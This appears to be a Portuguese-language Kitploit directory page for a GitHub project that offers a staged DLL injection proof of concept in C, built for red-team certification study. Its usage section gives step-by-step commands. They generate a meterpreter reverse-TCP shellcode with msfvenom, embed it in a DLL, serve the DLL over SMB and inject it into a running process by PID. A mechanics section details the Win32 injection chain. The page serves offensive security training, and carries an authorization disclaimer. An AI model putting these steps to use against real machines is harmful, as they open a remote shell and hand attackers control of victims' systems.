Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
staged-DLL-Injection-SMB- — Prova de conceito de injeção de DLL em estágios construída em C usando APIs Win32 — desenvolvida em um ambiente de laboratório isolado para estudo de certificação de red team (CRTO). | Kitploit
Ferramentas/GitHubGitHub/kasturixbm5/staged-dll-injection-smb-
ExploraçãoShellcodeTestes de PenetraçãoAprendizado e EducaçãoRed TeamingGeração de ShellcodeDesenvolvimento de PayloadsLabs e Prática
GitHub
kasturixbm5/staged-dll-injection-smb-

staged-DLL-Injection-SMB-

Prova de conceito de injeção de DLL em estágios construída em C usando APIs Win32 — desenvolvida em um ambiente de laboratório isolado para estudo de certificação de red team (CRTO).

Ver Repositório
42850há 3 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

staged-DLL-Injection

Prova de conceito de injeção DLL em estágios construída em C usando APIs Win32 — desenvolvida em ambiente de laboratório isolado para estudo de certificação de red team (CRTO).

⚠️ Aviso: Este projeto foi desenvolvido estritamente em ambiente de laboratório isolado para fins educacionais como parte de pesquisa de segurança ofensiva e estudo de certificação (CRTO). Não se destina ao uso contra qualquer sistema sem autorização explícita por escrito. O uso não autorizado é ilegal e antiético.

Visão Geral

Uma implementação de prova de conceito de injeção DLL em estágios no Windows, construída como parte de estudos de certificação de red team. Este projeto demonstra como um stager pode carregar remotamente uma DLL maliciosa em um processo alvo usando APIs Win32 nativas. Funciona melhor em um ambiente AD que permite tráfego SMB dentro da rede interna, não recomendado para funcionar pela internet.

Uso

root@kitploit:~
1. Build a shellcode with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f raw -o /directory/payload.bin
2. Obtain the raw shellcode and convert into a C array
xxd -i payload.bin > payload.h
3. Copy the shellcode, and paste it under unsigned char payload_bin[] {xxxxx} array in maindll.c
4. Modify the phc.c to point the address to your IP in dllPath[]
5. Compile phc.c into .exe, and compile maindll.c into .dll file
6. Host the smb server, and paste the maindll.dll
7. Set up Listener
8. Open Notepad.exe and find the PID
9. Run phc.exe <PID>

Como Funciona

Stager (phc.c)

  • Aceita um PID de processo alvo como argumento de linha de comando
  • Abre um handle para o processo alvo via OpenProcess
  • Aloca memória dentro do processo alvo via VirtualAlloc
  • Recupera o endereço de LoadLibraryW do Kernel32
  • Cria uma thread remota via CreateRemoteThread que chama LoadLibraryW, carregando a DLL de um compartilhamento SMB remoto

DLL (maindll.dll)

  • Contém um payload de shellcode embutido
  • DllMain é acionado automaticamente em DLL_PROCESS_ATTACH
  • Aloca memória executável via VirtualAlloc
  • Copia o shellcode para a memória e o executa via CreateThread

Fluxo de Ataque

phc.exe → Abre o processo alvo → Aloca memória no processo alvo → Carrega maindll.dll do compartilhamento SMB via LoadLibraryW → DllMain é acionado → Shellcode executado dentro do processo alvo

Técnicas Demonstradas

  • Injeção remota de DLL via CreateRemoteThread + LoadLibraryW
  • Incorporação e execução de shellcode em C
  • Abuso do ponto de entrada da DLL via DllMain
  • Estágio de payload remoto sobre SMB

Construído Com

  • C
  • Win32 API
  • msfvenom
  • Sliver C2

Ambiente

Testado no Windows 10 em ambiente de laboratório isolado. Listener C2 hospedado no Kali Linux.

Baixar ferramenta